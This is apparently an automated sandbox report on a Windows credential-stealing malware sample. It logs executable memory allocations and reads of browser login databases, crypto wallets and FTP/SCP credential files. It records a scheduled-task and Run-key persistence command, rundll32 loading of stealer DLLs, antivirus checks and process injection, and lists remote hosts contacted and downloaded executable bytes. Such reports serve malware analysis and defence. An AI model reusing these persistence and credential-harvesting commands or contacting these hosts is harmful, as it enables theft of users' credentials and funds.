heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0086c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0086d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0086e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0086f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02390000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0085a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0087a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00877000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0086a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00876000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02391000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02392000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file C:\Users\test22\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\cred64.dll
file C:\Users\test22\AppData\Local\Temp\Protect544cd51a.dll
file C:\Users\test22\AppData\Local\Temp\1000001001\hv.exe
file C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\clip64.dll
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe" /F
file C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
file C:\Users\test22\AppData\Local\Temp\1000001001\hv.exe
file C:\Users\test22\AppData\Local\Temp\Protect544cd51a.dll
file C:\Users\test22\AppData\Local\Temp\1000001001\hv.exe
file C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
file C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000001001\hv.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000001001\hv.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: taskhost.exe
process_identifier: 2356
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: Utsysc.exe
process_identifier: 2716
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: hv.exe
process_identifier: 2912
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: rundll32.exe
process_identifier: 2996
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: rundll32.exe
process_identifier: 3040
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00360000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL—b†à H=Fg= €=@ ?l©?@…Ðf=K =Ü?’>€qà> rf=  H.text$G= H= `.sdata €=L=@À.rsrcÜ? =@P=@@.reloc à>>@Bg=H°TÌ©¦¼%R+&+&((*.+&(c>*:+&þ ( *+&*+&*Z+&+&((*.+&(c>*:+&þ ( *+&*+&*0Õ+&+&(:.& 8Js € 86s €8Ýÿÿÿ& 8s €8×ÿÿÿ þþ E 4ÿÿÿ »ÿÿÿ«ÿÿÿ4¡ÿÿÿC 8Íÿÿÿs € 9¸ÿÿÿ&s € 8£ÿÿÿ(c> 8”ÿÿÿ*0+&~o 8*0+&~o 8*0+&~o! 8*0+&~o" 8*0+&~o# 8*+&*+&*0é +&(C(D:®& :x&~ (@ 8`9 (D9K&~  97& (A (g>(Bo9 s: 82 þþ Edÿÿÿ{ÿÿÿ‘ÿÿÿ¥ÿÿÿdÿÿÿ&8 & 8Ëÿÿÿ€  (C:¶ÿÿÿ&8*0+&~  8*2+&€ *02+&(E T(>~ o; (F t  8*02+&(E h(>~ (G(5 t  8*:+&+&(H*N+&þ þ (< *>+&þ (>*>+&þ (% *+&*+&*.+&(:*>+&þ (5 *Z+&þ þ þ o; *.+&(u>*Š+&+&(LsJ(Mt € *R+&+&(c>(= *0+&~  8*.+&(c>*>+&þ (> *+&*+&*0+&(K 8*+&*+&*0+&+&(¡9& 8I(ž8'& 84þ•s? (  8(Ÿ8Ùÿÿÿ þþ EšÿÿÿŸÿÿÿËÿÿÿ¯ÿÿÿšÿÿÿ 8Ùÿÿÿ*f+&(u>(o(@ *B+&{ 8*2+&} *0+&(£ 8*:+&oV*B+&{ 8*2+&} *0+&(¤ 8*:+&oZ*B+&{8*2+&}*0+&(¥ 8*:+&(¦*B+&{8*2+&}*0+&(§ 8*:+&(¨*B+&{8*2+&}*0+&(© 8*:+&(ª*B+&{8*2+&}*0+&(« 8*:+&(¬*B+&{8*2+&}*0+&(­ 8*:+&on*B+&{8*2+&}*0+&oq 8*:+&(®*B+&{8*2+&}*0+&(¯ 8*:+&(°*B+&{8*2+&}*0+&(± 8*:+&(²*B+&{8*2+&}*0+&(³ 8*:+&o~*B+&{8*2+&}*0+&(´ 8*:+&(µ*B+&{8*2+&}*0+&(¶ 8*:+&(·*B+&{8*2+&}*0+&o‰ 8*:+&oŠ*B+&{8*2+&}*0+&(¸ 8*:+&(¹*B+&{8*2+&}*0+&(º 8*:+&(»*B+&{8*2+&}*0+&(¼ 8*:+&(½*B+&{8*2+&}*0+&o™ 8
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $1óM#u’#pu’#pu’#p.ú'qg’#p.ú q~’#p.ú&qŒ#p ÿ&q3’#p ÿ'qz’#p ÿ q|’#p.ú"qx’#pu’"p´’#pîü*qq’#pîü#qt’#pîüÜpt’#pîü!qt’#pRichu’#pPEd†Äqeð" \H± €À` !Xx!ŒøИ¬ àÀ7p08pè.textøZ\ `.rdataâÅpÆ`@@.dataL@B&@À.pdata˜¬Ð®h@@_RDATA”€@@.rsrcø@@.relocà @BHƒì(A¸ HgH à[èƒË H $HƒÄ(鯝 ÌÌÌHƒì(A¸ H_H pbèSË H L$HƒÄ(é ÌÌÌHƒì(A¸HSH @cè#Ë H Œ$HƒÄ(éO ÌÌÌHƒì(A¸ H/H Ð\èóÊ H Ì$HƒÄ(é ÌÌÌHƒì(A¸H'H  aèÃÊ H %HƒÄ(éïœ ÌÌÌHƒì(A¸HH 0Zè“Ê H L%HƒÄ(鿜 ÌÌÌHƒì(E3ÀH‚oH #bèfÊ H %HƒÄ(钜 ÌÌÌÌÌÌHƒì(E3ÀHRoH “bè6Ê H Ï%HƒÄ(ébœ ÌÌÌÌÌÌHƒì(E3ÀH"oH \èÊ H &HƒÄ(é2œ ÌÌÌÌÌÌHƒì(E3ÀHònH óXèÖÉ H O&HƒÄ(éœ ÌÌÌÌÌÌHƒì(A¸H? H ÀYè£É H Œ&HƒÄ(éϛ ÌÌÌHƒì(A¸H H eèsÉ H Ì&HƒÄ(韛 ÌÌÌHƒì(A¸Hÿ H À`èCÉ H 'HƒÄ(éo› ÌÌÌHƒì(A¸Hß H pWèÉ H L'HƒÄ(é?› ÌÌÌHƒì(A¸H¿ H `ZèãÈ H Œ'HƒÄ(é› ÌÌÌHƒì(A¸ H¯ H ]è³È H Ì'HƒÄ(éߚ ÌÌÌHƒì(A¸H H €]èƒÈ H (HƒÄ(鯚 ÌÌÌHƒì(A¸Hk H 0[èSÈ H L(HƒÄ(éš ÌÌÌHƒì(A¸HG H `\è#È H Œ(HƒÄ(éOš ÌÌÌHƒì(A¸H/ H °^èóÇ H Ì(HƒÄ(éš ÌÌÌHƒì(A¸ H H `_èÃÇ H )HƒÄ(éï™ ÌÌÌHƒì(A¸LHï H Zè“Ç H L)HƒÄ(鿙 ÌÌÌHƒì(A¸H H `VècÇ H Œ)HƒÄ(鏙 ÌÌÌHƒì(A¸dHÿ H pbè3Ç H Ì)HƒÄ(é_™ ÌÌÌHƒì(A¸H7 H €_èÇ H *HƒÄ(é/™ ÌÌÌHƒì(A¸H H ð\èÓÆ H L*HƒÄ(éÿ˜ ÌÌÌHƒì(A¸ H H àUè£Æ H Œ*HƒÄ(éϘ ÌÌÌHƒì(A¸ Hï H °]èsÆ H Ì*HƒÄ(韘 ÌÌÌHƒì(A¸(HÏ H \èCÆ H +HƒÄ(éo˜ ÌÌÌHƒì(A¸ HÏ H Ð_èÆ H L+HƒÄ(é?˜ ÌÌÌHƒì(A¸ H¯ H €bèãÅ H Œ+HƒÄ(é˜ ÌÌÌHƒì(A¸H H ]è³Å H Ì+HƒÄ(éߗ ÌÌÌHƒì(A¸Ho H  _èƒÅ H ,HƒÄ(鯗 ÌÌÌHƒì(A¸ H_ H YèSÅ H L,HƒÄ(é— ÌÌÌHƒì(A¸,H? H @Zè#Å H Œ,HƒÄ(éO— ÌÌÌHƒì(A¸H? H ÐXèóÄ H Ì,HƒÄ(é— ÌÌÌHƒì(A¸ H/ H €]èÃÄ H -HƒÄ(éï– ÌÌÌHƒì(A¸$H H Ð^è“Ä H L-HƒÄ(鿖 ÌÌÌHƒì(A¸H H @ZècÄ H Œ-HƒÄ(鏖 ÌÌÌHƒì(A¸Hï H pRè3Ä H Ì-HƒÄ(é_– ÌÌÌHƒì(A¸Hß H  ZèÄ H .HƒÄ(é/– ÌÌÌHƒì(A¸ HÏ H VèÓà H L.HƒÄ(éÿ• ÌÌÌHƒì(A¸ H¯ H  [è£Ã H Œ.HƒÄ(éϕ ÌÌÌHƒì(A¸ H§ H 0Xèsà H Ì.HƒÄ(韕 ÌÌÌHƒì(A¸ H? H àSèCà H /HƒÄ(éo• ÌÌÌHƒì(A¸Ho H 0Wèà H L/HƒÄ(é?• ÌÌÌHƒì(A¸HW H Sèã H Œ/HƒÄ(é• ÌÌÌHƒì(A¸ H7 H P]è³Â H Ì/HƒÄ(éߔ ÌÌÌHƒì(A¸LHßH ÀWèƒÂ H 0HƒÄ(鯔 ÌÌÌHƒì(A¸Hç H ÐWèS H L0HƒÄ(é” ÌÌÌHƒì(A¸dHïH  Xè# H Œ0HƒÄ(éO” ÌÌÌHƒì(A¸H— H P]èóÁ H Ì0HƒÄ(é” ÌÌÌHƒì(A¸H H À[èÃÁ H 1HƒÄ(éï“ ÌÌÌHƒì(A¸ Hg H Wè“Á H L1HƒÄ(鿓 ÌÌÌHƒì(A¸HG H €SècÁ H Œ1HƒÄ(鏓 ÌÌÌHƒì(A¸H H p]è3Á H Ì1HƒÄ(é_“ ÌÌÌHƒì(A¸H÷H  VèÁ H 2HƒÄ(é/“ ÌÌÌHƒì(A¸HÏH pTèÓÀ H L2HƒÄ(éÿ’ ÌÌÌHƒì(A¸H¯H ÀQè£À H Œ2HƒÄ(éϒ ÌÌÌHƒì(A¸HH NèsÀ H Ì2HƒÄ(韒 ÌÌÌHƒì(A¸ HH @WèCÀ H 3HƒÄ(éo’ ÌÌÌHƒì(A¸0H_H Ð[èÀ H L3HƒÄ(é?’ ÌÌÌHƒì(A¸ HgH À[èã¿ H Œ3HƒÄ(é’ ÌÌÌHƒì(A¸HGH p\賿 H Ì3HƒÄ(éߑ ÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³c—jàc—jàc—jà8ÿiái—jà8ÿoáë—jà8ÿnáq—jà¶únál—jà¶úiár—jà¶úoáB—jà8ÿkád—jàc—kà—jàøùcá`—jàøùjáb—jàøù•àb—jàøùháb—jàRichc—jàPELƒÄqeà! ’!g à@°zœL{P°øÀÀo8øo@ H.textV  `.rdata°b d@@.data v@À.rsrcø°‚@@.relocÀ„@Bj hèl¹p˜èßHhè­SYÃÌÌÌj h m¹ˆ˜è¿Hh`èSYÃÌÌÌjh0m¹ ˜èŸHhÀèmSYÃÌÌÌjhHm¹¸˜èHh èMSYÃÌÌÌjhem¹Ð˜è_Hh€è-SYÃÌÌÌjhem¹è˜è?Hhàè SYÃÌÌÌjhem¹™èHh@èíRYÃÌÌÌjhem¹™èÿGh èÍRYÃÌÌÌhè¾RYÃÌÌÌÌh`è®RYÃÌÌÌÌhÀèžRYÃÌÌÌÌj?hðm¹x™è¯Gh è}RYÃÌÌÌhènRYÃÌÌÌÌh è^RYÃÌÌÌÌh@èNRYÃÌÌÌÌhàè>RYÃÌÌÌÌh€è.RYÃÌÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPèb[ƒÄ‹Æ^]ÂÌÌ̋I¸¼l…ÉEÁÃÌÌU‹ìV‹ñFÇÔ!Pè“[ƒÄöEt j VèLNƒÄ‹Æ^]AÇÔ!Pèi[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿh˜zEôPè;[ÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPè’ZƒÄÇ,"‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPèRZƒÄÇà!‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìì„ƒ}SV‹ÙW‰]à„Ûƒ}0„у}H„Çj/hhmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèŽEjjjjh˜mÿ,!ƒ}MjCMjjjjjPQP‰E´ÿ0!ƒ}4M jCM jjjjQhœmP‰E¸ÿ4!ƒ}LU8ÿuHCU8Mȃ}Ü‹ðRÿuØCMÈQV‰uÀÿ8!EüPhÿ…€ûÿÿPVÿ<!…À„iƒ}ü„\…€ûÿÿÇE”ÇE˜PÆE„fDŠ@„Éuù+M„P…€ûÿÿPè§D‹MüE„9M”ÇE¬BM”ƒ}˜QCE„MœPÇE°ÆEœèvDƒ}°Uœ‹}œ‹MôC׋Eø‹]¬+Á‰MÄSR;Øw,ƒ}øuä Cuä‰EôPè«j‹Mč3‹uÀƒÄ ÆëÆE¼Mäÿu¼Sè™G‹}œ‹E°ƒør+H‹Çùr‹üƒÁ#+ǃÀüƒø‡˜QWèXKƒÄ‹U˜ƒúr,‹M„B‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡dRQè$KƒÄ‹EüƄ€ûÿÿEüPhÿ…€ûÿÿPVÿ<!…À…šþÿÿ‹]àV‹5@!ÿÖÿu¸ÿÖÿu´ÿÖEä‹UܸÆEäó~EôfÖCÇEô‰Eøƒúr/‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡ÌRQèŒJ‹EøƒÄÇEØÇEÜÆEȃør.‹MäP‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡„RQèDJƒÄ‹UÇEôÇEøÆEäƒúr,‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡>RQèþIƒÄ‹U4ÇEÇEÆEƒúr,‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡øRQè¸IƒÄ‹ULÇE0ÇE4ÆE ƒú‚Ç‹M8B‹Áú‚«‹IüƒÂ#+ÁƒÀüƒø‡ªé’jhemÇCÇCÆèÝA‹Uƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwbRQè"IƒÄ‹U4ÇEÇEÆEƒú‚Lÿÿÿ‹M B‹Áú‚0ÿÿÿ‹IüƒÂ#+ÁƒÀüƒøwéÿÿÿRQèÓHƒÄ_^‹Ã[‹å]ÃèðnÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì<¹`™SVW‹=@™3öVhem3ÛèA…ÿ„–DCOãÿ€yKËÿÿÿCŠ‹ð¥¶Ñòæÿ€yNÎÿÿÿF¶†ð¥ˆƒð¥ˆŽð¥Mඃð¥‰uø¶ÀjÇEðÇEô¶€ð¥ˆEÿEÿPÆEàè—@Eàº`™PMÈèÆA‹ðƒÄþ`™t|‹ t™ƒùr.¡`™Aùr‹PüƒÁ#+ƒÀüƒø‡Ô‹ÂQPèµGƒÄÇp™Çt™Æ`™`™ó~FfÖp™ÇFÇFÆ‹U܃úr(‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw_RQèBGƒÄ‹UôÇEØÇEÜÆEȃúr(‹MàB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèGƒÄ…ÿt‹uøéoþÿÿ_^[‹å]ÃèmÌÌÌU‹ìƒì<SVW‹ùÇGÇGÆèþÿÿ¡t™¾`™‹`™ƒø»0™Còƒ=D™C0™+މ]øƒø¹`™¡p™CÊÁ;ð„*Š3Mà2ˆEÿEÿjPÇEðÇEôÆEàèÞ>Eà‹×PMÈè@‹ØƒÄ;ûte‹Oƒùr+‹Aùr‹PüƒÁ#+ƒÀüƒø‡Í‹ÂQPè FƒÄÇGÇGÆó~CfÖGÇCÇCÆ‹U܃úr(‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwiRQè§EƒÄ‹UôÇEØÇEÜÆEȃúr(‹MàB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw'RQèeEƒÄ¡t™F‹`™‹]øé¼þÿÿ‹Ç_^[‹å]ÃènkÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQƒ}4E SCE VWÿu0‰Mü¹H™Pè=ƒ}EÿuCE¹0™Pè„=‹5X™3ۋ=\™fDƒÿˆ›ð¥‹Ã¹H™C H™™÷þŠ ˆƒð¤Cû|Ô3ÿ3öŠ–𥶆ð¤ø¶Êùçÿ€yOÏÿÿÿGŠ‡ð¥ˆ†ð¥Fˆ—ð¥þ|Á‹uü‹Îè‡ýÿÿ‹Uƒúr
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00512200', u'virtual_address': u'0x00355000', u'entropy': 7.99466558290408, u'name': u'.vmp\\xc2\\xb0\\xc2\\xba', u'virtual_size': u'0x00512040'} entropy 7.9946655829 description A section with a high entropy has been found
section {u'size_of_data': u'0x00015200', u'virtual_address': u'0x0086a000', u'entropy': 7.086966260251924, u'name': u'.rsrc', u'virtual_size': u'0x00015062'} entropy 7.08696626025 description A section with a high entropy has been found
entropy 0.99829738933 description Overall entropy of this PE file is high
description PWS Memory rule Generic_PWS_Memory_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe"
cmdline netsh wlan show profiles
cmdline C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe" /F
section .vmp\xc2\xb0\xc2\xba description Section name indicates VMProtect
section .vmp\xc2\xb0\xc2\xba description Section name indicates VMProtect
section .vmp\xc2\xb0\xc2\xba description Section name indicates VMProtect
buffer Buffer with sha1: 2441a44b06509975255deafbaa7fd57a83a0bd41
buffer Buffer with sha1: 6804ce45dc780c4e632ae04c8ed72b3dc47f4568
host 185.172.128.113
host 185.172.128.5
host 94.130.51.115
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 860160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002c0
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\hv.exe reg_value C:\Users\test22\AppData\Local\Temp\1000001001\hv.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe" /F
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Roaming\Litecoin\wallets
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
file C:\Program Files\Windows NT\Accessories\.purple\accounts.xml
file C:\Windows\.purple\accounts.xml
file C:\util\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final\.purple\accounts.xml
file C:\Windows\System32\.purple\accounts.xml
file C:\Program Files\Windows Photo Viewer\.purple\accounts.xml
file C:\.purple\accounts.xml
file C:\SystemRoot\System32\.purple\accounts.xml
file C:\Program Files\_Sandboxie\.purple\accounts.xml
file C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\1000001001\.purple\accounts.xml
file C:\util\.purple\accounts.xml
file C:\Python27\.purple\accounts.xml
file C:\Program Files (x86)\Microsoft Office\Office12\.purple\accounts.xml
file C:\Users\test22\Downloads\.purple\accounts.xml
file C:\Program Files (x86)\Google\Chrome\Application\.purple\accounts.xml
file C:\Program Files (x86)\Hnc\Hwp80\.purple\accounts.xml
file C:\Program Files\_Wireshark\.purple\accounts.xml
file C:\Windows\SysWOW64\.purple\accounts.xml
file C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL’4leà ° >Ï @  ðÎ Kà   H.textD¯ °  `.rsrcà ² @@.reloc ¸ @B
base_address: 0x00400000
process_identifier: 2188
process_handle: 0x000002c0
1 1 0

WriteProcessMemory

